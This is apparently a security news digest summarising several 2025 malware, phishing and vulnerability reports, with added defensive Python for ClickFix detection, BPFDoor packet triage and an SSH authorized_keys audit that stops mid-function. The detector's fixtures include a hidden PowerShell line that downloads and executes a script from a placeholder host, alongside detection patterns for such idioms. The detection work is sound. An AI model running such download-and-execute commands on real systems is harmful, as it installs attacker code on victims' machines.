Chinese-speaking IronHusky hackers are actively targeting government organizations in Russia and Mongolia using an upgraded version of the MysterySnail remote access trojan (RAT) malware. Security researchers at Kaspersky's Global Research and Analysis Team (GReAT) recently discovered this updated implant during investigations into attacks utilizing a malicious MMC script disguised as a Word document. This script downloads second-stage payloads and establishes persistence on compromised systems, indicating a continued focus on espionage and data theft by the APT group.

This new version of MysterySnail RAT includes an intermediary backdoor that facilitates file transfers between command and control servers and infected devices, allowing attackers to execute commands. The IronHusky group is abusing the legitimate piping server (ppng[.]io) to request commands and send back their execution results. This technique helps the attackers to evade detection by blending malicious traffic with normal network activity, highlighting the sophisticated methods employed by the threat actor.

The MysterySnail RAT, initially discovered in 2021, has undergone significant evolution, demonstrating its adaptability and the persistent threat it poses. Despite a period of relative obscurity after initial reports, the RAT has re-emerged with updated capabilities targeting specific geopolitical interests. The continuous refinement and deployment of this malware underscores the ongoing cyber espionage activities carried out by the IronHusky APT group, with a particular focus on Russian and Mongolian government entities.

Recommended read:
References :
  • Securelist: MysterySnail RAT attributed to IronHusky APT group hasn’t been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
  • The DefendOps Diaries: The MysterySnail RAT: An Evolving Cyber Threat
  • BleepingComputer: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
  • Know Your Adversary: 108. Hunting for Node.js Abuse
  • bsky.app: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
  • www.kaspersky.com: Provides threat intelligence about the IronHusky APT group.
  • poliverso.org: IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
  • threatmon.io: Threatpost reports on Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
  • hackread.com: Kaspersky researchers report the reappearance of MysterySnail RAT, a malware linked to Chinese IronHusky APT, targeting Mongolia and…
  • securityonline.info: IronHusky APT Resurfaces with Evolved MysterySnail RAT
  • Talkback Resources: The MysterySnail RAT, linked to Chinese IronHusky APT, has resurfaced targeting government entities in Mongolia and Russia with a new version capable of executing 40 commands for malicious activities and deploying a modified variant named MysteryMonoSnail.
  • securityaffairs.com: Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
  • securelist.com: Kaspersky report on IronHusky updates the forgotten MysterySnail RAT
  • www.scworld.com: Stealthy multi-stage malware attack, updated MysterySnail RAT uncovered
  • securityaffairs.com: Malicious payloads have been distributed as part of a new covert multi-stage intrusion while Chinese advanced persistent threat operation IronHusky has been targeting Russian and Mongolian government entities with an upgraded MysterySnail RAT variant, reports The Hacker News.

@The DefendOps Diaries //
The Interlock ransomware gang is actively employing ClickFix attacks to infiltrate corporate networks and deploy file-encrypting malware. This social engineering tactic tricks users into executing malicious PowerShell commands, often under the guise of fixing an error or verifying their identity. By impersonating legitimate IT tools, Interlock bypasses traditional security measures that rely on automated detection, as the malicious code is executed manually by the victim. This represents a significant shift in the cyber threat landscape, highlighting the importance of understanding and defending against these evolving tactics.

ClickFix attacks involve manipulating users through deceptive prompts, such as fake error messages, CAPTCHA verifications, or system update requests. Victims are tricked into copying and pasting harmful commands into their systems, leading to the silent installation of malware. Interlock has been observed using fake browser and VPN client updates to deliver malware, and even uses compromised websites to redirect users to fake popup windows. These windows ask the user to paste scripts into a PowerShell terminal, initiating the malware infection process.

While the infrastructure supporting Interlock's ClickFix campaigns appears dormant since February 2025, the group's use of this technique signals ongoing innovation in their delivery mechanisms. This, combined with their consistent use of credential-stealing malware like LummaStealer and BerserkStealer, and a proprietary Remote Access Trojan (RAT), demonstrates Interlock's sophisticated approach to breaching networks. Organizations must enhance their security awareness training and implement measures to detect and prevent users from falling victim to ClickFix and other social engineering tactics.
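Both ClickFix write-ups above (the state-sponsored campaigns and the Interlock case) come down to the same execution pattern: a user pastes a one-liner into PowerShell or the Run dialog, so the interpreter is spawned interactively from explorer.exe with a download-and-execute command line. The following triage script is an added example and not code from any of the cited reports; it assumes Sysmon-style process-creation records with Image, ParentImage and CommandLine fields, and the sample events are constructed for illustration.

```python
"""Triage process-creation events for ClickFix-style "paste this into PowerShell" execution.

Added example, not code from the original reports. It assumes Sysmon-style
process-creation records (Image, ParentImage, CommandLine); the sample events
below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Interpreters that ClickFix lures ask the victim to paste commands into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# When a user pastes into the Win+R Run dialog, explorer.exe is the parent;
# legitimate IT tooling rarely spawns an interpreter that way.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Download-and-execute idioms typical of pasted one-liners (matched on the
# lower-cased command line).
SUSPICIOUS_PATTERNS = [
    (r"\b(iwr|invoke-webrequest|curl|wget)\b", "remote download"),
    (r"\b(iex|invoke-expression)\b", "in-memory execution"),
    (r"\bdownload(string|file)\b", "WebClient download"),
    (r"\s-(e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", "encoded command"),
    (r"\s-w(indowstyle)?\s+hidden\b", "hidden window"),
    (r"\bmshta(\.exe)?\s+https?://", "mshta remote HTA"),
]


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the reasons an event looks like ClickFix execution (empty if none)."""
    if basename(ev.image) not in INTERPRETERS:
        return []
    cmd = ev.command_line.lower()
    reasons = [label for pat, label in SUSPICIOUS_PATTERNS if re.search(pat, cmd)]
    if reasons and basename(ev.parent_image) in INTERACTIVE_PARENTS:
        reasons.append("launched interactively from explorer.exe (Run dialog / paste)")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that classify() flags."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),  # admin running a local script
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              'powershell -w hidden -c "iwr https://update.example.invalid/fix.txt | iex"'),  # pasted lure
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta https://verify.example.invalid/captcha"),  # fake CAPTCHA variant
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\svchost.exe",
              "powershell -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),  # encoded, but not user-launched
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for r in reasons:
            print(f"    - {r}")
```

The parent-process check is what separates a pasted lure from a scheduled task or an installer: an encoded command under svchost.exe is still worth a look, but an interpreter that explorer.exe spawned with a download-and-execute line is the ClickFix signature the articles describe, and it is the event to alert on.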

Recommended read:
References :
  • securityonline.info: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • The DefendOps Diaries: The Rise of ClickFix Attacks: Understanding the Interlock Ransomware Gang
  • BleepingComputer: Interlock ransomware gang pushes fake IT tools in ClickFix attacks
  • www.scworld.com: ClickFix increasingly utilized in state-backed malware attacks
  • cyberpress.org: Interlock Ransomware Delivers Malicious Browser Updates via Multi-Stage Attack on Legitimate Websites
  • gbhackers.com: Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates
  • Cyber Security News: Reports show the latest ClickFix attack.
  • www.scworld.com: Interlock ransomware evolves tactics with ClickFix, infostealers
  • Talkback Resources: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • securityonline.info: Security Online discusses interlock ransomware using Evolving Tactics to Evade Detection.
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
  • bsky.app: Interlock ransomware gang pushes fake IT tools in ClickFix attacks ift.tt/TqmAQIF
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks

Bill Toulas@BleepingComputer //
A new malware-as-a-service (MaaS) platform, called 'SuperCard X', has surfaced, targeting Android devices. This malware leverages Near-Field Communication (NFC) relay attacks to facilitate unauthorized point-of-sale (POS) and Automated Teller Machine (ATM) transactions. It operates by using compromised payment card data obtained through social engineering tactics. Victims are often lured into downloading a malicious application via SMS or phone calls, which then captures payment card data when the card is in proximity to the infected device.

This sophisticated Android-based malware is part of a fraud campaign that combines social engineering, malware distribution, and NFC data interception. The data captured is relayed in real-time through a Command and Control (C2) infrastructure to an attacker-controlled device, enabling immediate fraudulent cash withdrawals and purchases. The malware’s architecture includes two applications: “Reader” for capturing NFC card data and “Tapper” for receiving this data and performing the fraud. Communication between these apps uses HTTP over a C2 infrastructure, which employs mutual TLS (mTLS) to secure and authenticate connections.

SuperCard X exhibits a low detection rate among antivirus solutions due to its narrow focus on NFC data capture and minimal permission requirements. Cleafy Threat Intelligence researchers identified code similarities between SuperCard X and the open-source NFCGate tool, as well as another Android malware called NGate. This type of attack represents a significant escalation in fraud capabilities, extending beyond the usual targets of banking institutions to directly impact payment providers and card issuers.

Recommended read:
References :
  • gbhackers.com: New Android SuperCard X Malware Uses NFC-Relay Technique for POS & ATM Transactions
  • BleepingComputer: A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data.
  • The DefendOps Diaries: Explore SuperCard X, a sophisticated mobile malware using NFC relay attacks and minimal permissions to evade detection.
  • Cyber Security News: New Android SuperCard X Malware Employs NFC-Relay Technique for Fraudulent POS & ATM Withdrawals
  • BleepingComputer: New Android malware steals your credit cards for NFC relay attacks
  • cybersecuritynews.com: CybersecurityNews reports New Android SuperCard X Malware Employs NFC-Relay Technique for Fraudulent POS & ATM Withdrawals
  • www.cleafy.com: Cleafy Labs reports SuperCard X: exposing a Chinese-speaker MaaS for NFC Relay fraud operation
  • Secure Bulletin: SuperCard X: exposing a MaaS for NFC Relay fraud operation
  • securebulletin.com: SuperCard X: exposing a MaaS for NFC Relay fraud operation
  • www.bleepingcomputer.com: New Android malware steals your credit cards for NFC relay attacks
  • bsky.app: Talkback Threat Summary for Android SuperCard X Malware Uses NFC-Relay Technique for POS & ATM Transactions
  • securityaffairs.com: New sophisticated malware SuperCard X targets Androids via NFC relay attacks
  • The Hacker News: SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks
  • www.scworld.com: Novel SuperCard X MaaS platform leveraged for payment card compromise

Pierluigi Paganini@Security Affairs //
The North Korean hacking group Kimsuky has been identified as the perpetrator of a new cyber espionage campaign, dubbed "Larva-24005," that exploits a patched Microsoft Remote Desktop Services flaw, commonly known as BlueKeep (CVE-2019-0708), to gain initial access to systems. According to a report from the AhnLab Security intelligence Center (ASEC), Kimsuky targeted organizations in South Korea and Japan, primarily in the software, energy, and financial sectors, beginning in October 2023. The campaign also extended to other countries, including the United States, China, Germany, and Singapore, indicating a broader global reach.

The attackers used a combination of techniques to infiltrate systems. While RDP vulnerability scanners were found on compromised systems, the report indicates that the actual breaches were not always initiated through the use of these scanners. Instead, Kimsuky leveraged phishing emails containing malicious attachments that exploited the Microsoft Office Equation Editor vulnerability (CVE-2017-11882) to distribute malware. Once inside, the attackers installed a dropper to deploy various malware suites, including MySpy, designed to collect system information, and RDPWrap, a tool that facilitates persistent remote access by modifying system settings.

To further their surveillance capabilities, Kimsuky deployed keyloggers such as KimaLogger and RandomQuery to capture user keystrokes. The group predominantly used ".kr" domains for their Command and Control (C2) operations, employing sophisticated setups to manage traffic routing and potentially evade detection. ASEC's analysis of the attackers' infrastructure revealed a global footprint, with victims identified in countries across Asia, Europe, and North America. The use of both RDP exploits and phishing suggests a versatile approach to compromising target systems, highlighting the importance of both patching vulnerabilities and educating users about phishing tactics.

Recommended read:
References :
  • securityaffairs.com: Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
  • The Hacker News: Kimsuky Exploits BlueKeep RDP Vulnerability to Breach Systems in South Korea and Japan
  • gbhackers.com: The AhnLab SEcurity intelligence Center (ASEC) has released a detailed analysis of a sophisticated cyber campaign dubbed “Larva-24005,” linked to the notorious North Korean hacking group Kimsuky.
  • securityonline.info: A new cybersecurity report from the AhnLab Security intelligence Center (ASEC) has shed light on a recently identified
  • Daily CyberSecurity: A new cybersecurity report from the AhnLab Security intelligence Center (ASEC) has shed light on a recently identified
  • ciso2ciso.com: Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan – Source: securityaffairs.com
  • ciso2ciso.com: Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
  • www.csoonline.com: North Korea-backed Kimsuky targets unpatched BlueKeep systems in new campaign
  • www.scworld.com: Attacks with BlueKeep, Microsoft Office exploits launched by Kimsuky-linked group

Anna Ribeiro@Industrial Cyber //
Trend Micro researchers have uncovered a novel controller linked to the BPFDoor backdoor, enabling stealthy reverse shell attacks on Linux servers across Asia and the Middle East. This previously unseen controller is attributed to the Red Menshen advanced persistent threat (APT) group, tracked by Trend Micro as Earth Bluecrow. The attacks, observed in the telecommunications, finance, and retail sectors, have been documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. This discovery highlights the ongoing cyberespionage activities leveraging sophisticated and evasive techniques to compromise Linux systems.

The controller's primary function is to open a reverse shell on compromised systems, which allows attackers to move laterally within the network, control additional systems, and access sensitive data. BPFDoor uses the packet filtering features of the Berkeley Packet Filter (BPF) to inspect network packets, using "magic sequences" to activate the backdoor. This method allows BPFDoor to evade traditional security measures, making it a perfect tool for long-term espionage, as casual security sweeps won’t detect anything unusual. The malware can also change process names and does not listen on any port, further masking its presence.

Trend Micro's investigation indicates that BPFDoor has been active since at least 2021, with consistent campaigns targeting Linux servers across multiple industries. The attackers are known to hide malware in non-standard paths, such as /tmp/zabbix_agent.log or /bin/vmtoolsdsrv. Defenders are advised to monitor for TCP packets whose payload starts with 0x5293 followed by an IP:port and a password, as well as the corresponding UDP/ICMP packets. Because the magic packets are customizable and the passwords vary, static indicators are unreliable; proactive network monitoring and analysis of BPF code are crucial for protecting organizations against BPF-powered threats.
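A network-side check for the TCP indicator quoted above, as an added example that is not code from Trend Micro's report: it flags payloads beginning with 0x5293 and tries to recover the IP:port and password that the article says follow it. The byte layout after the magic value, the separator between fields, and the sample packets are all assumptions constructed for illustration; the magic value is a parameter because the article notes it is customizable.

```python
"""Flag candidate BPFDoor activation packets in TCP payloads.

Added example, not code from Trend Micro's report. It uses the indicator the
article gives (a TCP payload that begins with 0x5293, followed by an IP:port
and a password); the byte layout after the magic value, the separator and the
sample packets are assumptions constructed for illustration.
"""
import re
from typing import Optional

TCP_MAGIC = b"\x52\x93"  # 0x5293, the TCP magic value named in the article
# ASCII "a.b.c.d:port" token; a real implant may encode this differently.
IP_PORT_RE = re.compile(rb"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def inspect_tcp_payload(payload: bytes, magic: bytes = TCP_MAGIC) -> Optional[dict]:
    """Return a finding when the payload starts with the magic value, else None.

    `magic` is a parameter because the article notes the magic packets are
    customizable: swap in the value recovered from a given sample's BPF filter.
    """
    if not payload.startswith(magic):
        return None
    rest = payload[len(magic):]
    finding = {"callback": None, "password_present": False}
    m = IP_PORT_RE.search(rest)
    if m:
        ip, port = m.group(1).decode(), int(m.group(2))
        if all(0 <= int(o) <= 255 for o in ip.split(".")) and 0 < port < 65536:
            finding["callback"] = (ip, port)
            # Whatever follows the IP:port token (after NUL/space padding) is
            # treated as the activation password (assumed layout).
            tail = rest[m.end():].lstrip(b" \x00")
            finding["password_present"] = len(tail) > 0
    return finding


def scan_packets(packets, magic: bytes = TCP_MAGIC):
    """Return (index, finding) for each TCP packet whose payload carries the magic."""
    hits = []
    for i, pkt in enumerate(packets):
        if pkt["proto"] != "tcp":
            continue  # UDP/ICMP use other magic values that the article does not quote
        finding = inspect_tcp_payload(pkt["payload"], magic)
        if finding is not None:
            hits.append((i, finding))
    return hits


# Constructed sample packets (documentation address ranges, no real traffic).
SAMPLE_PACKETS = [
    {"proto": "tcp", "src": "203.0.113.10", "dst": "192.0.2.5:80",
     "payload": b"GET / HTTP/1.1\r\nHost: 192.0.2.5\r\n\r\n"},
    {"proto": "tcp", "src": "203.0.113.10", "dst": "192.0.2.5:22",
     "payload": TCP_MAGIC + b"198.51.100.7:4444\x00" + b"p4ssw0rd-example"},
    {"proto": "tcp", "src": "203.0.113.11", "dst": "192.0.2.5:443",
     "payload": TCP_MAGIC + b"\x00\x00\x00\x00"},  # magic but no parsable callback
    {"proto": "udp", "src": "203.0.113.12", "dst": "192.0.2.5:53",
     "payload": b"\x12\x34\x01\x00"},
]

if __name__ == "__main__":
    for idx, finding in scan_packets(SAMPLE_PACKETS):
        pkt = SAMPLE_PACKETS[idx]
        print(f"packet {idx} {pkt['src']} -> {pkt['dst']}: {finding}")
```

A two-byte prefix will produce occasional false positives on binary protocols, which is why the second sample (magic present, nothing parsable behind it) is reported with an empty callback rather than dropped: the point is to surface it for a human, and, as the article says, to pair this with inspection of the BPF programs attached to sockets on the host rather than relying on the bytes alone.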

Recommended read:
References :
  • securityonline.info: BPFDoor Backdoor Used in Asia, Middle East Cyberespionage
  • Virus Bulletin: Trend Micro's Fernando Mercês writes about BPFDoor, a state-sponsored backdoor designed for cyberespionage activities targeting the telecommunications, finance and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia and Egypt.
  • www.trendmicro.com: BPFDoor’s new hidden controller emerges! Attackers can open reverse shells or direct port for stealth access on Linux servers.
  • gbhackers.com: A new wave of cyber espionage attacks has brought BPFDoor malware into the spotlight as a stealthy and dangerous tool for compromising networks.
  • Cyber Security News: CybersecurityNews: Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks
  • gbhackers.com: GBHackers: BPFDoor Malware Uses Reverse Shell to Expand Control Over Compromised Networks
  • Industrial Cyber: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • www.scworld.com: Novel BPFDoor backdoor component facilitates covert attacks
  • Security Risk Advisors: 🚩 BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • industrialcyber.co: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • sra.io: BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks

Jenna McLaughlin@NPR Topics: Technology //
A whistleblower at the US National Labor Relations Board (NLRB) has come forward with allegations of a significant cybersecurity breach involving the Department of Government Efficiency (DOGE), overseen by Elon Musk. According to the whistleblower, Daniel Berulis, DOGE operatives arrived at the agency in early March and were granted unrestricted access to internal systems, a move that deviated from standard operating procedures. The whistleblower claims that these DOGE employees ignored infosec rules and were instructed to hand over any requested accounts and stay out of DOGE’s way.

According to the affidavit submitted to the Senate Intelligence Committee, these actions led to a "significant cybersecurity breach" potentially exposing the agency's data to foreign adversaries. The whistleblower also alleges that during their activity, DOGE employees exfiltrated 10GB of data to servers in the US and disabled monitoring tools, raising concerns about potential data exposure. Berulis’s document points out that not even his CIO enjoyed the level of access given to DOGE unit operatives, and that the NLRB already had auditor accounts set up that provided enough privileges to check data without being able to edit, copy, or remove it.

The most alarming aspect of the allegations involves attempted access to the NLRB's systems from a Russian IP address using legitimate accounts created by DOGE staffers. These attempts were reportedly blocked, but the valid credentials used suggest a potential compromise. NPR has reported that the data that DOGE moved could have included sensitive information on unions, ongoing legal cases and corporate secrets. Democratic lawmakers are calling for an investigation into the matter.

Recommended read:
References :
  • ciso2ciso.com: Whistleblower alleges Russian IP address attempted access to US agency’s systems via DOGE-created accounts – Source: www.csoonline.com
  • The Register - Security: Whistleblower describes DOGE IT dept rampage at America's labor watchdog
  • www.csoonline.com: Whistleblower alleges Russian IP address attempted access to US agency’s systems via DOGE-created accounts.
  • DataBreaches.Net: A whistleblower’s disclosure details how DOGE may have taken sensitive labor data
  • aboutdfir.com: A whistleblower’s disclosure details how DOGE may have taken sensitive labor data. In the first days of March, a team of advisers from President Trump’s new Department of Government Efficiency initiative arrived at the Southeast Washington, D.C., headquarters of the National Labor Relations Board.
  • Policy ? Ars Technica: Government IT whistleblower calls out DOGE, says he was threatened at home
  • NPR Topics: Technology: Someone using a Russian IP address attempted to access the internal systems of the US National Labor Relations Board (NLRB) using legitimate accounts set up by staff from Elon Musk's Department of Government Efficiency (DOGE), a whistleblower inside the agency has alleged.

Stu Sjouwerman@blog.knowbe4.com //
A China-based cybercriminal gang known as the "Smishing Triad" is reportedly launching a wave of SMS phishing attacks, or "smishing," targeting users in both the US and the UK. These attacks are themed around road tolls, with victims receiving text messages that appear to be from toll road operators. The messages warn recipients of unpaid toll fees and potential fines if the fees are not promptly addressed. Cybersecurity researchers have issued warnings about this widespread and ongoing SMS phishing campaign, noting that it has been actively targeting toll road users since mid-October 2024, aiming to steal their financial information.

Researchers have linked the surge in these SMS scams to new features added to a popular commercial phishing kit sold in China. This kit simplifies the process of creating convincing lures that spoof toll road operators across multiple US states. The phishing pages are designed to closely mimic the websites of these operators as they appear on mobile devices, and in some cases, will not even load unless accessed from a mobile device. The goal of these kits is to obtain enough information from victims to add their payment cards to mobile wallets. These cards can then be used for fraudulent purchases in physical stores, online, or to launder money through shell companies.

The phishing campaigns often impersonate U.S. electronic toll collection systems like E-ZPass, sending SMS messages and Apple iMessages to individuals across several states including Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois, and Kansas. The texts prompt recipients to click on a fake link, often requiring them to reply with "Y" to activate the link, a tactic used in other phishing kits. Victims who click the link are directed to a fraudulent E-ZPass page where they are asked to enter personal and financial information, which is then stolen by the attackers.

Recommended read:
References :
  • blog.knowbe4.com: Toll-themed smishing attacks surge in US and UK
  • The Hacker News: Cybersecurity researchers are warning of a widespread and ongoing SMS phishing campaign that's been targeting toll road users in the United States for financial theft since mid-October 2024.
  • ciso2ciso.com: Cybersecurity researchers are warning of a "widespread and ongoing" SMS phishing campaign that's been targeting toll road users in the United States for financial theft since mid-October 2024.
  • krebsonsecurity.com: Residents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid.
  • The DefendOps Diaries: Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States
  • ciso2ciso.com: Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States – Source:thehackernews.com
  • www.scworld.com: Massive ongoing US toll fraud underpinned by Chinese smishing kit

@github.com //
A critical Remote Code Execution (RCE) vulnerability, identified as CVE-2025-32434, has been discovered in PyTorch, a widely used open-source machine learning framework. This flaw, detected by security researcher Ji’an Zhou, undermines the safety of the `torch.load()` function, even when configured with `weights_only=True`. This parameter was previously trusted to prevent unsafe deserialization, making the vulnerability particularly concerning for developers who relied on it as a security measure. The discovery challenges long-standing security assumptions within machine learning workflows.

This vulnerability affects PyTorch versions 2.5.1 and earlier and has been assigned a CVSS v4 score of 9.3, indicating a critical security risk. Attackers can exploit the flaw by crafting malicious model files that bypass deserialization restrictions, allowing them to execute arbitrary code on the target system during model loading. The impact is particularly severe in cloud-based AI environments, where compromised models could lead to lateral movement, data breaches, or data exfiltration. As Ji'an Zhou noted, the vulnerability is paradoxical because developers often use `weights_only=True` to mitigate security issues, unaware that it can still lead to RCE.

To address this critical issue, the PyTorch team has released version 2.6.0. Users are strongly advised to immediately update their PyTorch installations. For systems that cannot be updated immediately, the only viable workaround is to avoid using `torch.load()` with `weights_only=True` entirely. Alternative model-loading methods, such as using explicit tensor extraction tools, are recommended until the patch is applied. With proof-of-concept exploits likely to emerge soon, delayed updates risk widespread system compromises.

Recommended read:
References :

Nathaniel Morales@feeds.trendmicro.com //
Cybercriminals are actively deploying FOG ransomware disguised as communications from the U.S. Department of Government Efficiency (DOGE) via malicious emails. This campaign, which has been ongoing since January, involves cybercriminals spreading FOG ransomware by claiming ties to DOGE in their phishing attempts. The attackers are impersonating the U.S. DOGE to infect targets across multiple sectors, including technology and healthcare. It has been revealed that over 100 victims have been impacted by this DOGE-themed ransomware campaign since January.

Cybercriminals are distributing a ZIP file named "Pay Adjustment.zip" through phishing emails. Inside this archive is an LNK file disguised as a PDF document. Upon execution, this LNK file triggers a PowerShell script named "stage1.ps1", which downloads additional ransomware components. The script also opens politically themed YouTube videos, potentially to distract the victim. The initial ransomware note makes references to DOGE to add confusion. The attackers utilize a tool called 'Ktool.exe' to escalate privileges by exploiting a vulnerability in the Intel Network Adapter Diagnostic Driver.

The ransomware note, RANSOMNOTE.txt, references DOGE and includes names of individuals associated with the department. Victims are being asked to pay $1,000 in Monero, although it is unclear whether paying the ransom leads to data recovery or if it is an elaborate troll. Trend Micro revealed that the latest samples of Fog ransomware, uploaded to VirusTotal between March 27 and April 2, 2025, spread through distribution of a ZIP file containing an LNK file disguised as a PDF.

Recommended read:
References :
  • cyberinsider.com: FOG Ransomware Impersonates U.S. DOGE to Infect Targets
  • gbhackers.com: Cybercriminals Deploy FOG Ransomware Disguised as DOGE via Malicious Emails
  • www.trendmicro.com: FOG Ransomware Spread by Cybercriminals Claiming Ties to DOGE
  • www.scworld.com: Fog ransomware notes troll with DOGE references, bait insider attacks
  • securityonline.info: FOG Ransomware Campaign Targets Multiple Sectors with Phishing and Payload Obfuscation
  • darkwebinformer.com: FOG Ransomware Attack Update for the 21st of April 2025

@unit42.paloaltonetworks.com //
A new multi-stage malware attack has been identified, deploying a range of malware families including Agent Tesla, Remcos RAT, and XLoader. This intricate attack chain employs multiple execution paths, designed to evade detection, bypass traditional sandboxes, and ensure the successful delivery and execution of malicious payloads. Attackers are increasingly relying on these complex delivery mechanisms to compromise systems.

This campaign, observed in December 2024, begins with phishing emails disguised as order release requests, enticing recipients to open malicious archive attachments. These attachments contain JavaScript encoded (.JSE) files, which initiate the infection chain by downloading and executing a PowerShell script from an external server. The PowerShell script then decodes and executes a Base64-encoded payload.

The attack then diverges into two possible execution paths. One involves a .NET executable that decrypts an embedded payload, such as Agent Tesla or XLoader, and injects it into a running "RegAsm.exe" process. The other path uses an AutoIt compiled executable containing an encrypted payload that loads shellcode and injects a .NET file into a "RegSvcs.exe" process, ultimately leading to Agent Tesla deployment. This dual-path approach highlights the attacker's focus on resilience and evasion, using simple, stacked stages to complicate analysis and detection.

Recommended read:
References :
  • Virus Bulletin: Palo Alto's Saqib Khanzada looks into a multi-layered campaign that delivers malware like Agent Tesla variants, Remcos RAT or XLoader. This multi-layered attack chain leverages multiple execution paths to evade detection and complicate analysis.
  • The Hacker News: Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader
  • Anonymous: Palo Alto's Saqib Khanzada looks into a multi-layered campaign that delivers malware like Agent Tesla variants, Remcos RAT or XLoader.

@Talkback Resources //
Cybersecurity researchers have recently discovered a series of malicious packages lurking within the npm registry, a popular repository for JavaScript packages. These packages are designed to mimic the legitimate "node-telegram-bot-api," a widely-used library for creating Telegram bots. However, instead of providing bot functionalities, these rogue packages install SSH backdoors on Linux systems, granting attackers persistent, passwordless remote access. The identified malicious packages include "node-telegram-utils," "node-telegram-bots-api," and "node-telegram-util," which have accumulated around 300 downloads collectively.

The packages employ a technique known as "typosquatting," where they use names similar to the legitimate library to deceive developers into installing them. They also utilize "starjacking" by linking to the genuine library's GitHub repository, further enhancing their appearance of authenticity. Once installed on a Linux system, these malicious packages inject SSH keys into the "~/.ssh/authorized_keys" file, enabling attackers to remotely access the compromised machine. They also collect system information, including the username and external IP address, and transmit it to a remote server controlled by the attackers.

Security experts warn that simply removing the malicious packages is insufficient to eliminate the threat. The injected SSH keys provide a persistent backdoor, allowing attackers to execute code and exfiltrate data even after the packages are uninstalled. This incident highlights the growing threat of supply chain attacks targeting development ecosystems like npm, underscoring the importance of rigorous dependency auditing and vigilant monitoring to safeguard systems from malicious code and unauthorized access. The researchers at Socket recommend immediate defensive actions to combat these types of threats.
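Because uninstalling the packages leaves the planted keys in place, the check a Linux administrator actually needs is an audit of authorized_keys against a list of approved fingerprints. The Python below is an added example (ours, not Socket's tooling): it parses the file format, including a leading options field, computes OpenSSH-style SHA256 fingerprints, and reports every key not on the approved list. The sample file and both key blobs are constructed inline (filler bytes, not real keys).

```python
import base64
import hashlib

def _ssh_string(b):
    return len(b).to_bytes(4, "big") + b

def make_blob(key_type, *fields):
    """Build a base64 OpenSSH key blob (wire format); used here only to construct sample keys."""
    raw = _ssh_string(key_type.encode()) + b"".join(_ssh_string(f) for f in fields)
    return base64.b64encode(raw).decode()

# Constructed stand-ins for an approved key and a planted one (32 filler bytes, not real points).
APPROVED_KEY = make_blob("ssh-ed25519", b"\x01" * 32)
PLANTED_KEY = make_blob("ssh-ed25519", b"\x02" * 32)
SAMPLE_AUTHORIZED_KEYS = f"""# admin workstation
ssh-ed25519 {APPROVED_KEY} admin@workstation

no-pty,command="/bin/true" ssh-ed25519 {PLANTED_KEY} build@ci
"""
KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint: base64(sha256(blob)) without '=' padding."""
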